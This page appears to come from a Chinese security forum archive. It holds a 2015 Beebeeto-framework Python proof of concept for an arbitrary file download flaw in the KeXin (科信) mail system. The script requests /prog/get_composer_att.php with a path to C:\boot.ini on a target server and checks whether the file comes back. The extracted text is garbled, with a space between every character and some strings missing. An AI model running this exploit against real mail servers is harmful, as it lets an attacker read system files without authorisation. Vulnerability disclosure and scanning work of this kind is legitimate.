[2341] 2015-10-07_【POC】科信邮件系统任意文件下载漏洞

文档创建者:s7ckTeam
浏览次数:8
最后更新:2025-01-16
2015-10-07_【POC】科信邮件系统任意文件下载漏洞 P O C b e e b e e t o   E   2 0 1 5 - 1 0 - 0 7 E E I D : E A Q a p p # ! / u s r / b i n / e n v   p y t h o n #   c o d i n g = u t f - 8 " " " A u t h o r :   w a r s o n g F r a m e w o r k :   h t t p s : / / g i t h u b . c o m / n 0 t r 0 0 t / B e e b e e t o - f r a m e w o r k " " " i m p o r t   r e q u e s t s f r o m   b a s e f r a m e   i m p o r t   B a s e F r a m e c l a s s   M y P o c ( B a s e F r a m e ) : p o c _ i n f o   =   { #   p o c ' p o c ' :   { ' i d ' :   ' p o c - 2 0 1 5 - 0 1 4 1 ' , ' n a m e ' :   '   / p r o g / g e t _ c o m p o s e r _ a t t . p h p     P O C ' , ' a u t h o r ' :   ' w a r s o n g ' , ' c r e a t e _ d a t e ' :   ' 2 0 1 5 - 0 9 - 2 3 ' , } , #   ' p r o t o c o l ' :   { ' n a m e ' :   ' h t t p ' , ' p o r t ' :   [ 8 0 ] , ' l a y e r 4 _ p r o t o c o l ' :   [ ' t c p ' ] , } , #  
' v u l ' :   { ' a p p _ n a m e ' :   ' ' , ' v u l _ v e r s i o n ' :   [ ' * ' ] , ' t y p e ' :   ' A r b i t r a r y   F i l e   D o w n l o a d ' , ' t a g ' :   [ ' ' ,   ' ' ,   ' p h p ' ] , ' d e s c ' :   ' ' ' ' ' ' , ' r e f e r e n c e s ' :   [ ' h t t p : / / w w w . w o o y u n . o r g / b u g s / w o o y u n - 2 0 1 4 - 0 6 6 8 9 2 ' ] , } , } @ c l a s s m e t h o d d e f   v e r i f y ( c l s ,   a r g s ) : u r l   =   a r g s [ ' o p t i o n s ' ] [ ' t a r g e t ' ] v e r i f y _ u r l   =   ( ' % s / p r o g / g e t _ c o m p o s e r _ a t t . p h p ? a t t _ s i z e = 1 6 2 3 & f i l e n a m e p a t h ' ' = C : b o o t . i n i & m a x a t t _ s i g n = 4 b c 8 8 2 e 8 c 4 a 9 8 a c 7 a 9 7 a c d 3 2 1 a a d 4 f ' ' 8 8 & a t t a c h _ f i l e n a m e = b o o t . i n i ' )   %   u r l i f   a r g s [ ' o p t i o n s ' ] [ ' v e r b o s e ' ] : p r i n t   ' [ * ]   R e q u e s t   U R L :   '   +   v e r i f y _ u r l r e q   =   r e q u e s t s . g e t ( v e r i f y _ u r l ) i f   r e q . s t a t u s _ c o d e   = =   2 0 0   a n d   ' b o o t . i n i '   i n   r e q . c o n t e n t : i f   ' c o n f i g u r a t i o n '   i n   r e q . c o n t e n t : a r g s [ ' s u c c e s s ' ]   =   T r u e a r g s [ ' p o c _ r e t ' ] [ ' v u l _ u r l ' ]   =   v e r i f y _ u r l r e t u r n   a r g s e x p l o i t   =   v e r i f y i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' : f r o m   p p r i n t   i m p o r t   p p r i n t m p   =   M y P o c ( ) p p r i n t ( m p . r u n ( ) ) E E E
便
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则